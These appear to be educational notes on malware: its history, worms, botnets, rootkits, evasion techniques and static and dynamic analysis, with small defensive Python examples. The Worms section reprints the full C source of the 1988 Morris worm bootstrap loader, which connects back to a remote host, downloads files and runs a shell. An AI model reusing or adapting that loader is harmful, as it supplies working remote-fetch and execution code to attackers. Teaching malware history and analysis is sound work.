Definition

Malware is a portmanteau of “malicious software”: code that is intentionally written to violate a security policy. Malware is usually described in terms of several “categories”, or “features”:

  • Viruses: code that self-propagates by infecting other files, usually executables (but also documents with macros and boot loaders). A virus is not a standalone program (i.e. not an executable on its own)
  • Worms: programs that self-propagate, even remotely, often by exploiting host vulnerabilities or through social engineering (e.g. mail worms)
  • Trojan horses: apparently benign programs that hide a malicious functionality and usually allow remote control
  • Bots: programs that allow remote control of a machine, usually as part of a botnet

In 1971, Creeper, the first malware, demonstrated that systems could be infected. The first real virus was developed in 1981 and demonstrated that vulnerabilities could actually be exploited. The word “virus” was coined in 1983. Since then, the scale of attacks has escalated to the entire planet. From 2012 onward, the diffusion of ransomware grew, helped by the availability of Bitcoin.

It is possible to distinguish three main phases in the history of malicious software:

  • Demonstration (1990-2000): showing off the skills of the geek community. The viruses created in this period were not critical, and software houses used them to fix their products
  • Mass Attacks (after 2000): profit orientation, organized groups and opportunism (the beginning of botnets) were the main factors motivating the geek community and the rising web criminals
  • Strategic Attacks (from 2010): high-profile targets, critical infrastructures, political activism, espionage, states as actors (botnets too)

Fred Cohen (1983) theorized the existence of viruses and produced the first examples. According to his definition, a virus is simply a self-replicating program. He approached the topic from a theoretical computer science point of view, as an interesting concept of self-modifying and self-propagating code. The security challenges were soon understood.

Warning

It is impossible to build the perfect virus detector (i.e., propagation detector). Let P be a perfect detection program, and let V be a virus that calls P on itself:

  • if P(V) is true (V is reported as a virus), V halts (does not spread), so V is not a virus
  • if P(V) is false (V is reported as clean), V spreads, so V is a virus

Either way P is wrong about V, so P cannot exist. This is just another version of the halting problem, which refers to the impossibility of creating a program that can determine whether any given program will eventually halt or run forever. This fundamental limitation arises from the undecidability of the problem, meaning no algorithm can exist to solve it for all cases. However, the community started to look for ways to detect viruses and started studying the malicious code lifecycle.
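
The contradiction in the impossibility argument above can be sketched in a few lines of Python. This is only an illustration under simplifying assumptions: the names `make_contrary_program` and `detector_is_fooled` are hypothetical, a "program" is modelled as a function returning a label, and "spread" is just a string (nothing is actually propagated).

```python
from typing import Callable

Program = Callable[[], str]
Detector = Callable[[Program], bool]


def make_contrary_program(detector: Detector) -> Program:
    """Build a program that does the opposite of what `detector` predicts for it."""
    def program() -> str:
        if detector(program):   # the detector claims "this is a virus" ...
            return "halt"       # ... so the program does not spread
        return "spread"         # the detector claims "clean", so it "spreads"
    return program


def detector_is_fooled(detector: Detector) -> bool:
    """Return True if the detector's verdict disagrees with the real behavior."""
    program = make_contrary_program(detector)
    verdict = detector(program)            # what the detector claims
    is_virus = program() == "spread"       # what the program actually does
    return verdict != is_virus


# Two trivial candidate detectors: both are fooled.
print(detector_is_fooled(lambda p: True))   # True
print(detector_is_fooled(lambda p: False))  # True
```

Any detector that returns an answer without running the program is fooled in the same way. A detector that tries to decide by running the program ends up calling itself again and again (Python would stop it with a RecursionError), which is the halting problem showing up in practice.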

The malicious code lifecycle can be divided into 4 phases:

  • reproduce, during which the malware creates copies of itself
  • infect, during which the malware infects other files or machines
  • stay hidden, during which the malware tries to avoid detection (stealth techniques) and stay alive
  • run payload, during which the malware executes its malicious code (e.g., steal data, send spam, etc.). The payload is simply the code executed after the three previous steps, once the machine is infected; it can be harmful or not.

Malware usually tries to stay hidden for some time during its lifecycle to avoid being detected. In the reproduction and infection phases, a balance between infection and the possibility of detection must be found, together with a suitable propagation vector (social engineering or vulnerability exploits). Files must be infected (viruses only) and the malware must propagate to other machines. Much modern malware (most bots and trojans) does not self-propagate at all. In the 90s, the main device carrying viruses was the floppy disk, and the most common vector was games.

Two main types of virus exploited floppy disks:

  • Boot viruses: infect the Master Boot Record (MBR) of the hard disk (the first sector on the disk) or the boot sector of partitions (e.g. Brain, and more recently Mebroot/Torpig). They are rather old, but interest is growing again (diskless workstations, virtual machines (SubVirt)). Floppies were among the first disks loaded by the BIOS (this is not the case on UEFI systems)
  • File infectors: simple overwrite viruses (which damage the original program and are easy to detect), parasitic viruses (which, instead of deleting the original program, append code and modify the program entry point so that both the malicious and the normal code execute; they fell out of use because checking entry points made them easy to detect), or (multi)cavity viruses (which inject code into unused region(s) of the program code)

Another vector used to spread viruses was the macro.

Definition

A macro is a set of instructions that are grouped together as a single command to accomplish a task automatically. Macros are used to automate repetitive tasks, which can be done by a single command. A typical example is the “record macro” function in Microsoft Office.

Data files were traditionally considered safe from viruses, but the introduction of macro functionality blurred the line between data and code. One notable example of this type of malware is the Melissa virus. What made Melissa particularly challenging to deal with was its ability to infect the user’s other documents, making it difficult to remove. Although the Melissa virus was not destructive, it was incredibly annoying.

The Melissa virus was written in Visual Basic for Applications (VBA), a programming language commonly used for writing macros in Microsoft Office. It spread through email as a macro inside an attached Word document. When a user opened the infected document, the macro executed and the virus sent itself to the first 50 contacts in the user’s address book.

This type of malware highlighted the vulnerability of data files and the potential risks associated with macros. The Melissa virus served as a wake-up call for the security community, prompting a closer examination of the security measures needed to protect against such threats.

It is important to be cautious when opening email attachments, especially those that contain macros. Keeping antivirus software up to date and regularly scanning files for potential threats can help mitigate the risk of falling victim to malware like the Melissa virus. By staying vigilant and adopting best practices for cybersecurity, users can better protect themselves and their data from these types of malicious attacks.

Worms

Definition

A worm is a type of malware that spreads copies of itself from computer to computer. Worms often use networks to spread, relying on security vulnerabilities to infect other devices. Unlike viruses, worms do not need to attach themselves to an existing program to spread.

The Internet faced a major disruption in November 1988 when Robert Morris Jr., a Ph.D. student at Cornell, unleashed a program that caused havoc on the network. The worm exploited vulnerabilities such as buffer overflows and relied on password cracking. Its bootstrap program, reproduced below, was just 99 lines of C: it connects back to the infecting machine, downloads the rest of the worm and starts it.

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
 
main(argc, argv)
char *argv[];
{
	struct sockaddr_in sin;
	int s, i, magic, nfiles, j, len, n;
	FILE *fp;
	char files[20][128];
	char buf[2048], *p;
 
	unlink(argv[0]);
	if(argc != 4)
		exit(1);
	for(i = 0; i < 32; i++)
		close(i);
	i = fork();
	if(i < 0)
		exit(1);
	if(i > 0)
		exit(0);
 
	bzero(&sin, sizeof(sin));
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = inet_addr(argv[1]);
	sin.sin_port = htons(atoi(argv[2]));
	magic = htonl(atoi(argv[3]));
 
	for(i = 0; i < argc; i++)
		for(j = 0; argv[i][j]; j++)
			argv[i][j] = '\0';
 
	s = socket(AF_INET, SOCK_STREAM, 0);
	if(connect(s, &sin, sizeof(sin)) < 0){
		perror("l1 connect");
		exit(1);
	}
	dup2(s, 1);
	dup2(s, 2);
 
	write(s, &magic, 4);
 
	nfiles = 0;
	while(1){
		if(xread(s, &len, 4) != 4)
			goto bad;
		len = ntohl(len);
		if(len == -1)
			break;
 
		if(xread(s, &(files[nfiles][0]), 128) != 128)
			goto bad;
 
		unlink(files[nfiles]);
		fp = fopen(files[nfiles], "w");
		if(fp == 0)
			goto bad;
		nfiles++;
 
		while(len > 0){
			n = sizeof(buf);
			if(n > len)
				n = len;
			n = read(s, buf, n);
			if(n <= 0)
				goto bad;
			if(fwrite(buf, 1, n, fp) != n)
				goto bad;
			len -= n;
		}
		fclose(fp);
	}
 
	execl("/bin/sh", "sh", 0);
bad:
	for(i = 0; i < nfiles; i++)
		unlink(files[i]);
	exit(1);
}
 
static
xread(fd, buf, n)
char *buf;
{
	int cc, n1;
 
	n1 = 0;
	while(n1 < n){
		cc = read(fd, buf, n - n1);
		if(cc <= 0)
			return(cc);
		buf += cc;
		n1 += cc;
	}
	return(n1);
}
int zz;

Once connected to a computer, the program would copy itself to the new location and start running. Both the original code and its copies would continue this process, spreading rapidly across the network. This uncontrolled replication was unintended, but it caused widespread damage and brought down large parts of the Internet of the time. The incident served as a stark reminder of the potential consequences of unchecked malware and the importance of robust security measures.

Mass mailers are the most common type of worm and they were developed when mail software started allowing attached files, including executables (dancing bears) and executables masquerading as data (e.g. “LOVE-LETTER-FOR-YOU.txt.vbs”). These worms were simply spread by emailing themselves to others, using an address book to look more trustworthy. Modern variations include social networks to spread (e.g. suspicious-looking Twitter messages or Facebook posts from a friend).
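
On the defensive side, the “executable masquerading as data” trick can be spotted with a simple filename check. The sketch below is only an illustration: the function name `looks_masqueraded` and both extension lists are assumptions chosen for the example, not a complete or authoritative list.

```python
from pathlib import PurePath

# Hypothetical, deliberately short lists used only for illustration.
EXECUTABLE_EXTENSIONS = {".vbs", ".exe", ".scr", ".js", ".bat", ".com", ".pif"}
DATA_EXTENSIONS = {".txt", ".doc", ".pdf", ".jpg", ".png", ".xls"}


def looks_masqueraded(filename: str) -> bool:
    """Flag names such as 'note.txt.vbs': a data-like extension followed by an executable one."""
    suffixes = [s.lower() for s in PurePath(filename).suffixes]
    return (
        len(suffixes) >= 2
        and suffixes[-1] in EXECUTABLE_EXTENSIONS
        and suffixes[-2] in DATA_EXTENSIONS
    )


print(looks_masqueraded("LOVE-LETTER-FOR-YOU.txt.vbs"))  # True
print(looks_masqueraded("report.pdf"))                   # False
```

A real mail filter would combine such a check with content inspection, since the file name is fully under the sender's control.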

Modern Worms: Mass Scanners

The basic pattern is the same: a computer is infected and seeks out new targets. Spreading is faster (minutes) and happens on a larger scale (hundreds of thousands of hosts). The main feature is scanning, which can be performed in various ways:

  • Select random address
  • Local preference: more scans towards local network
  • Permutation scanning (divide up IP address space), more efficient, doesn’t infect already infected machines
  • Hit list scanning
  • Warhol worm: Hit list + permutation, most efficient: exponential speed in spread.
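
The effect of these strategies on spreading speed can be explored with a small epidemic-style model. The sketch below is a purely numerical simulation of random scanning under stated assumptions: every number (vulnerable population, scan rate, hit-list size) is hypothetical, the model works on expected values only, and the function names are made up for this example. A hit list is modelled simply as a larger set of initially infected hosts.

```python
def simulate_random_scanning(vulnerable, initially_infected, scans_per_step,
                             steps, address_space=2**32):
    """Expected number of infected hosts after each time step under random scanning."""
    infected = float(initially_infected)
    history = [infected]
    for _ in range(steps):
        # Probability that a given vulnerable host receives at least one
        # of the probes sent during this step.
        probes = scans_per_step * infected
        p_hit = 1.0 - (1.0 - 1.0 / address_space) ** probes
        infected += (vulnerable - infected) * p_hit
        history.append(infected)
    return history


def steps_to_reach(history, target):
    """First time step at which the infected count reaches `target`, or None."""
    for step, infected in enumerate(history):
        if infected >= target:
            return step
    return None


# Hypothetical parameters, chosen only to make the curves visible.
VULNERABLE = 360_000
single_seed = simulate_random_scanning(VULNERABLE, 1, 4000, 200)
with_hit_list = simulate_random_scanning(VULNERABLE, 10_000, 4000, 200)

print(steps_to_reach(single_seed, 0.9 * VULNERABLE))
print(steps_to_reach(with_hit_list, 0.9 * VULNERABLE))
```

The curve is slow at first, then grows roughly exponentially, then flattens as few vulnerable hosts remain. Starting from a hit list skips the slow initial phase, which is why it reaches saturation in fewer steps. The same kind of model is useful to defenders for estimating how quickly detection and response must happen.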

Many in the security field speculated that the future would bring more worm outbreaks. However, since 2004 there has been a lack of major worm incidents. Although there were vulnerabilities that could have been exploited, the worm writers seemed to have disappeared. One might wonder why no worm has ever targeted the Internet infrastructure. The reason is simple: destroying the Internet would hinder the spread of worms. While there were windows of opportunity for attacks, the attackers needed the infrastructure to be functional to carry out their activities. Nowadays, attackers are more interested in monetizing their malware through various means:

  • Direct monetization (e.g., abuse of credit cards, connection to premium numbers)
  • Indirect monetization (information gathering, abuse of computing resources, renting or selling botnet infrastructures)

All of this created a growing underground (black) economy and cybercrime ecosystem.

In real life, attacks are carried out by criminal groups that hire one group to create the malware and another to spread it (the latter has the infrastructure to do so). The criminal group monetizes the malware and hires yet another group to convert the money so that it cannot be tracked (e.g. through scam activities). Various “activities” are involved: exploit development and procurement, site infection, victim monitoring, selling “exploit kits”, and client support.

Bots

Definition

A bot was originally just a program used on IRC channels to keep them open.

At the beginning, only universities and companies could afford a permanent internet connection, and this is where the first bots were used. However, bots soon began to be used for other purposes as well, with the IRC channel used to send commands to the bot and, through it, to the university machine hosting it.

A botnet nowadays is a network of compromised machines, under the control of a command and control server.

DoS attacks were carried out using this mechanism: first through the abuse of IRC bots (the IRC wars, among the first documented DDoS attacks); then, in 1999, with trinoo, a “DDoS attack tool” (it originally ran on Solaris and was later ported to Windows; the setup of the botnet was mostly manual); and, in August 1999, with a DDoS attack against a server at the University of Minnesota that used at least 227 bots. In 2000, DDoS attacks against high-profile websites (Amazon, CNN, eBay) got huge media coverage.

A botnet consists of several malicious bots controlled by a commander, commonly known as the botmaster (or bot herder). Botnets allow the botmaster to do almost anything on the infected machines. For example, Phatbot can harvest email addresses from the host, log all keypresses, sniff network traffic, take screenshots, start an HTTP server that allows browsing C:, kill a hard-coded list of processes (AV programs, rival malware), steal Windows CD keys (and keys to popular games), set up a SOCKS proxy to be used as a “stepping stone” for spam, download a file from a URL, run a shell command, and update itself, which allows changing the available commands.

Threats posed by bot(net)s are:

  • For the infected host: information harvesting (identity data, financial data, private data, e-mail address books, any other type of data that may be present on the host of the victim)
  • For the rest of the Internet: Spamming, DDoS, Propagation (network or email worm), Support infrastructure for illegal internet activity (the botnet itself, phishing sites, drive-by-download sites)

To defend against malware some techniques are usually combined:

  • Patches: most worms exploit known vulnerabilities, useless against zero-day worms
  • Signatures: must be developed automatically, worms operate too quickly for human response
  • Intrusion or anomaly detection: notice fast spreading, suspicious activity, can be a driver to automated signature generation
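
As a minimal sketch of the “notice fast spreading” idea, the code below flags hosts that contact an unusually large number of distinct destinations within one observation window. The input format (a list of source/destination pairs), the function name `fast_scanners` and the threshold are all assumptions made for this example; a real detector would also consider failed connections, ports and timing.

```python
from collections import defaultdict


def fast_scanners(flows, threshold):
    """Return the sources that contacted at least `threshold` distinct destinations.

    `flows` is an iterable of (source, destination) pairs observed in one time window.
    """
    destinations = defaultdict(set)
    for source, destination in flows:
        destinations[source].add(destination)
    return sorted(src for src, dsts in destinations.items() if len(dsts) >= threshold)


# Hypothetical window: one host probes 50 addresses, another talks to two servers.
window = [("10.0.0.7", f"192.0.2.{i}") for i in range(50)]
window += [("10.0.0.8", "192.0.2.1"), ("10.0.0.8", "192.0.2.2")]

print(fast_scanners(window, threshold=20))  # ['10.0.0.7']
```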

Antivirus and Anti-malware

The basic strategy of antivirus and anti-malware products is signature-based detection: the binary of a known malware sample is analyzed, and a database of byte-level or instruction-level signatures is used to check files for patterns that match known malware. Wildcards can be used, and regular expressions are also common. However, this only works for known attacks.

Malware evolves faster than humans can study it, so combining several strategies is the best approach. Since signatures alone are not enough, antivirus and anti-malware products also use heuristics, i.e. checks for signs of infection (code execution starting in the last section, incorrect header size in the PE header, suspicious code section names, a patched import address table). Behavioral detection is applied as well: this strategy detects signs (behavior) of known malware and “common behaviors” of malware in general. Not everything needs an antivirus: it all depends on the threat assessment and on the trade-offs of each case.
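
A byte-level signature with wildcards can be sketched with Python's `re` module. This is a minimal illustration, not how any particular product works: the textual signature syntax (hex bytes separated by spaces, `??` for “any byte”), the function names and the sample signatures are all assumptions made for this example.

```python
import re


def compile_signature(pattern: str) -> "re.Pattern[bytes]":
    """Turn a signature such as 'DE AD ?? BE EF' into a compiled bytes regex."""
    parts = []
    for token in pattern.split():
        if token == "??":
            parts.append(b".")  # wildcard: exactly one arbitrary byte
        else:
            parts.append(re.escape(bytes([int(token, 16)])))
    # DOTALL so that the wildcard also matches the newline byte 0x0A.
    return re.compile(b"".join(parts), re.DOTALL)


def scan(data: bytes, signatures: dict) -> list:
    """Return the names of all signatures found anywhere in `data`."""
    return [name for name, pattern in signatures.items()
            if compile_signature(pattern).search(data)]


# Hypothetical signature database and harmless sample bytes.
SIGNATURES = {"demo-family": "DE AD ?? BE EF", "other-family": "CA FE BA BE"}
sample = b"\x00\x01\xde\xad\x42\xbe\xef\x02"

print(scan(sample, SIGNATURES))  # ['demo-family']
```

Changing a single fixed byte of the matched sequence is enough to evade such a signature, which illustrates why this approach only works for known samples.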
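
Two of the heuristics listed above (execution starting in the last section, suspicious section names) can be sketched on an already parsed header. The code below does not parse real PE files: the `Section` type, the list of usual section names and the function name `heuristic_flags` are assumptions introduced for this illustration.

```python
from dataclasses import dataclass


@dataclass
class Section:
    name: str
    start: int   # address where the section begins
    size: int    # size of the section in bytes


# Hypothetical allow-list of commonly seen section names.
USUAL_NAMES = {".text", ".data", ".rdata", ".bss", ".idata", ".edata", ".rsrc", ".reloc"}


def heuristic_flags(entry_point: int, sections: list) -> list:
    """Return human-readable warnings for a parsed executable header."""
    flags = []
    if not sections:
        return ["no sections"]
    last = max(sections, key=lambda s: s.start)
    if last.start <= entry_point < last.start + last.size:
        flags.append("entry point in last section")
    for section in sections:
        if section.name not in USUAL_NAMES:
            flags.append(f"unusual section name: {section.name}")
    return flags


sections = [
    Section(".text", 0x1000, 0x2000),
    Section(".data", 0x3000, 0x1000),
    Section(".xyz", 0x4000, 0x0800),
]
print(heuristic_flags(0x4010, sections))
```

Heuristics like these produce hints rather than proof: legitimate packers and unusual compilers can trigger them too, so they are normally combined with other evidence.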

Virus Stealth Techniques

Stealth techniques are defense mechanisms employed by malware to avoid detection. Virus scanners quickly discover viruses by searching around the entry point; therefore viruses can deploy:

  • Entry Point Obfuscation: the virus uses multiple cavities and hijacks control after the program is launched (by overwriting import table addresses (e.g., libraries) and function call instructions)
  • Polymorphism: the virus changes layout (shape) with each infection; the same payload is encrypted (packing) with a different key for each infection, which makes signature analysis practically impossible (the AV could detect the encryption routine, but encryption is a common activity on a PC)
  • Packers: the virus encrypts/decrypts itself before/after execution, using a small encryption/decryption routine and changing the key at each execution. Typical functions are de/compression, de/encryption, metamorphic components, anti-debugging techniques, anti-VM techniques, virtualization
  • Metamorphism: the virus creates different “versions” of code that look different but have the same semantics (i.e., do the same)
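
From the defender's point of view, the reason a fixed byte signature fails against polymorphism can be seen with a toy encoding. The sketch below uses a single-byte XOR only as a stand-in for the per-infection encryption described above (an assumption made for simplicity), and the “payload” is a harmless placeholder string.

```python
def xor_encode(data: bytes, key: int) -> bytes:
    """Encode (or decode) bytes with a single-byte XOR key."""
    return bytes(b ^ key for b in data)


payload = b"EXAMPLE-PAYLOAD"   # harmless placeholder, not real code
signature = b"PAYLOAD"         # byte signature extracted from the plain payload

copy_a = xor_encode(payload, 0x21)   # "infection" with one key
copy_b = xor_encode(payload, 0x5A)   # "infection" with another key

print(signature in payload)                   # True: plain copy is detected
print(signature in copy_a)                    # False: encoded copy is missed
print(copy_a != copy_b)                       # True: every copy looks different
print(xor_encode(copy_a, 0x21) == payload)    # True: same payload underneath
```

This is why scanners fall back on detecting the decoding routine itself, or on observing the payload once it has been decoded in memory.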

The primary stealth techniques employed by malware include polymorphism and metamorphism, which are designed to preserve the underlying functionality while generating various versions of the malicious code. Additional general stealth techniques utilized by malware include:

  • Dormant periods: This strategy involves delaying malicious activity, where the malware remains inactive for a predetermined period or until specific conditions are met (e.g., a particular date or event). This approach aims to evade detection during initial scans or surveillance.
  • Event-triggered payloads: Malware often incorporates event-driven activation mechanisms, where the execution of malicious payloads is contingent upon specific events or commands received via a Command and Control (C&C) channel. By remaining dormant until triggered, the malware can avoid detection until it receives the necessary stimulus.
  • Anti-virtualization techniques: Advanced malware employs methods to detect and evade virtual machine (VM) environments, where its malicious behavior is suppressed or altered. Techniques may include timing-based attacks that exploit differences in virtualized and physical environments, or environmental checks to identify virtual machine characteristics.
  • Encryption/Packing: Similar to polymorphism, this technique involves encrypting or packing the malware code using sophisticated algorithms and techniques. Encrypted or packed malware variants can evade signature-based detection and analysis tools, complicating efforts to identify and analyze their malicious payloads.
  • Rootkit techniques: Among the most advanced stealth methods, rootkit techniques involve modifying the core components of the operating system (OS), such as the kernel, to conceal the presence of malware. This may include techniques like syscall hijacking, where the malware intercepts and modifies OS system calls to manipulate system behavior and evade detection by security measures.

These techniques collectively enhance the malware’s ability to persist undetected within systems, prolonging their operational lifespan and maximizing their impact on targeted environments.

Anti-virtualization techniques

If a program is not run natively on a machine, chances are high that it is being analyzed (in a security lab), scanned (inside the sandbox of an antivirus product) or debugged (by a security specialist). Modern malware detects its execution environment to complicate analysis, which can be performed on:

  • virtual machine: very easy (timing, environment detection)
  • hardware supported virtual machine: adjusted techniques, still easy (timing, environment detection)
  • emulator: theoretically undetectable, practically also easy to detect (timing attack, incomplete specs so different emulator implementations)

Rootkits

Definition

A rootkit is a set of software tools that enable an unauthorized user to gain control of a computer system without being detected. Rootkits are typically installed through a security vulnerability or by exploiting a password. Once installed, a rootkit can allow an attacker to execute files, access system data, and monitor user activity.

This is a historical term: an attacker becomes root on a machine and plants their kit to remain root, which allows them to make files, processes, users and directories disappear. The attacker also wants to remain invisible, and the kit is what they use to hide their tracks.

Rootkits can be deployed at two main levels: userland or kernel-space.

A Linux userland rootkit typically consists of a backdoored login, sshd and passwd, plus trojanized utilities that hide the attacker: ps, netstat, ls, find, du, who, w, finger, ifconfig. Windows userland rootkit targets can be Task Manager, Process Explorer, netstat, ipconfig. Once access is gained, trojanized utilities are needed so that the presence of the malware is not detected (they hide the attacker only). To hide all tracks, the attacker must trojanize every equivalent command. Userland rootkits are thus often incomplete: the attacker trojanizes only a subset of the utilities, so the malware may be easy to detect by running an equivalent command that was not replaced (cross-layer examination, comparing utilities with those of a clean machine).

Another possibility is to develop a rootkit at kernel level, where the rootkit performs syscall hijacking. Every time a syscall is invoked, its output is masked by the attacker: utilities are not substituted, but they show fake results that hide the attacker’s tracks. A kernel-space rootkit is more difficult to build, but can hide artifacts completely. It can only be detected via post-mortem analysis, i.e. by checking every single component once the machine is off.
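
Comparing utilities with those of a clean machine can be approximated by comparing cryptographic hashes against a known-good baseline. The sketch below is a simplified illustration using Python's standard `hashlib`; the function names `snapshot` and `modified` are made up for this example, and the demo works on a temporary file rather than on real system binaries.

```python
import hashlib
import tempfile
from pathlib import Path


def snapshot(paths) -> dict:
    """Map each path to the SHA-256 digest of the file's current content."""
    return {str(p): hashlib.sha256(Path(p).read_bytes()).hexdigest() for p in paths}


def modified(baseline: dict, current: dict) -> list:
    """Return the paths whose digest differs from (or is missing in) the baseline."""
    return sorted(path for path, digest in current.items()
                  if baseline.get(path) != digest)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as directory:
        utility = Path(directory) / "ls"
        utility.write_bytes(b"original utility")
        baseline = snapshot([utility])          # taken while the system is clean

        utility.write_bytes(b"trojanized utility")
        print(modified(baseline, snapshot([utility])))  # the replaced file is listed
```

The baseline must be stored off the machine, and the comparison should ideally run from trusted media, because a compromised system can lie about file contents.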

Methods for recognizing rootkits are:

  • intuition (the easiest technique): looking for odd side effects that reveal inconsistencies
  • post-mortem analysis on a different system
  • trusted computing base/Tripwire
  • cross-layer examination: the same information is checked from different points of view
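
Cross-layer examination boils down to collecting the same information through two different layers and looking for disagreements. The sketch below assumes the two views have already been collected (for example, process IDs reported by a possibly trojanized utility versus IDs enumerated from a lower, more trusted layer); how they are collected is outside the scope of the example, and the function name `cross_view_diff` is hypothetical.

```python
def cross_view_diff(high_level_view, low_level_view) -> dict:
    """Compare two views of the same resource (e.g. process IDs or file names)."""
    high, low = set(high_level_view), set(low_level_view)
    return {
        # Present at the lower layer but not reported by the utility: likely hidden.
        "hidden": sorted(low - high),
        # Reported by the utility but absent at the lower layer: also inconsistent.
        "phantom": sorted(high - low),
    }


# Hypothetical data: the utility does not report process 666.
reported_by_utility = [1, 2, 3, 40]
seen_at_lower_layer = [1, 2, 3, 40, 666]

print(cross_view_diff(reported_by_utility, seen_at_lower_layer))
# {'hidden': [666], 'phantom': []}
```

Processes that start or stop between the two measurements produce false positives, so in practice the comparison is repeated before drawing conclusions.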

However, rootkits can get even more complex:

  • Rootkits in the BIOS: in ACPI (John Heasman), in CMOS (eEye bootloader), bootkits (not even in the BIOS, Brossard)
  • Rootkits in the firmware of a NIC or video card
  • Rootkits in virtualization systems (how can a rootkit that acts as a hypervisor be recognized?)

In these cases the device remains infected even after being switched off.

Counteracting Malware: Malware Analysis Overview

A typical workflow after a malware sample is discovered consists of:

  1. suspicious executable reported by “someone”
  2. automatically analyzed
  3. manually analyzed
  4. antivirus signature developed

There are two ways to analyze the malware:

| | Dynamic analysis | Static analysis |
|---|---|---|
| Approach | observe the runtime behavior of the executable | parse the executable code |
| Pros | copes with obfuscation (metamorphism, encryption, packing, …) | code coverage, dormant code |
| Cons | code coverage, dormant code | obfuscation (metamorphism, encryption, packing, …) |

Static Analysis

Static analysis is the process of examining the code of a program without executing it. This approach involves analyzing the binary code or source code of the malware to identify potential threats, vulnerabilities, or malicious behavior. Static analysis techniques include:

  • Disassembly: The process of converting machine code into assembly language to understand the program’s logic and functionality.
  • Decompilation: The reverse engineering process of converting machine code or assembly language back into a higher-level programming language to analyze the program’s structure and behavior.
  • Code analysis: The examination of the program’s code to identify vulnerabilities, malicious functions, or suspicious behavior.
  • Signature matching: The comparison of the malware’s code against known signatures or patterns to detect known threats.
  • Pattern recognition: The identification of specific patterns or sequences in the code that indicate malicious behavior or vulnerabilities.
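
One very simple form of static pattern recognition is extracting printable strings from a binary, similar in spirit to the Unix `strings` utility. The sketch below is a minimal version under stated assumptions: it handles ASCII only, the minimum length of 4 is an arbitrary default, and the sample bytes are made up.

```python
import re


def printable_strings(data: bytes, min_len: int = 4) -> list:
    """Return runs of at least `min_len` printable ASCII characters found in `data`."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [match.decode("ascii") for match in pattern.findall(data)]


# Hypothetical sample: binary noise with two embedded strings.
sample = b"\x00\x01http://example.invalid/cmd\x00ab\x00MZ\x90hello\xff"

print(printable_strings(sample))  # ['http://example.invalid/cmd', 'hello']
```

Embedded URLs, file names or command names found this way often give a first hint about what a sample does, although packed or encrypted samples expose very few meaningful strings.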

Static analysis provides valuable insights into the structure and behavior of malware, enabling security researchers to identify potential threats and develop effective countermeasures. By examining the code and logic of the malware, analysts can gain a deeper understanding of its capabilities, intentions, and impact on systems and networks. This kind of analysis is particularly useful for identifying dormant code and hidden functionality that may not be exercised during dynamic analysis.

Dynamic Analysis

Dynamic analysis involves executing the malware in a controlled environment to observe its behavior, interactions, and impact on the system. This approach allows security researchers to study the malware’s runtime behavior, network activity, system modifications, and payload execution. Dynamic analysis techniques include:

  • Sandboxing: The isolation of the malware in a controlled environment to prevent it from affecting the host system and network.
  • Behavioral monitoring: The observation of the malware’s actions, interactions, and system modifications during execution to identify malicious behavior.
  • Network monitoring: The analysis of the malware’s network activity, communication channels, and data exchanges to detect command-and-control (C&C) traffic or data exfiltration.
  • Payload analysis: The examination of the malware’s payload execution, data manipulation, and system modifications to understand its impact on the system.
  • Memory analysis: The study of the malware’s memory usage, process interactions, and system calls to identify malicious behavior or vulnerabilities.
  • Dynamic code analysis: The analysis of the malware’s runtime behavior, function calls, and system interactions to predict its actions and impact.
  • Execution tracing: The monitoring of the malware’s execution flow, function calls, and system interactions to track its behavior and identify malicious activities.
  • Resource monitoring: The observation of the malware’s resource usage, file access, and system modifications to detect malicious behavior or system changes.
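
Behavioral monitoring ultimately turns a trace of observed events into a verdict. The sketch below assumes the sandbox already produced a list of `(event_kind, detail)` tuples; the event names, the rules and their thresholds are hypothetical values chosen only to illustrate the idea.

```python
from collections import Counter

# Hypothetical rules: each maps a description to a test on the event counts.
RULES = {
    "mass file modification": lambda counts: counts["file_write"] >= 100,
    "many outbound connections": lambda counts: counts["connect"] >= 50,
    "process termination spree": lambda counts: counts["kill_process"] >= 5,
}


def flag_behaviors(events) -> list:
    """Return the names of all rules triggered by a trace of (kind, detail) events."""
    counts = Counter(kind for kind, _detail in events)
    return [name for name, rule in RULES.items() if rule(counts)]


# Hypothetical trace recorded while a sample ran in a sandbox.
trace = [("file_write", f"doc{i}.txt") for i in range(120)]
trace.append(("connect", "192.0.2.10"))

print(flag_behaviors(trace))  # ['mass file modification']
```

Counting events is a crude approximation: real behavioral engines also look at the order of events and at which resources are touched.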

Dynamic analysis provides real-time insights into the behavior and impact of malware, enabling security researchers to identify threats, vulnerabilities, and malicious activities. By executing the malware in a controlled environment and monitoring its actions, analysts can gain a deeper understanding of its capabilities, intentions, and impact on systems and networks. This kind of analysis is particularly useful for analyzing malware that adopts obfuscation, polymorphism, or anti-debugging techniques to evade detection.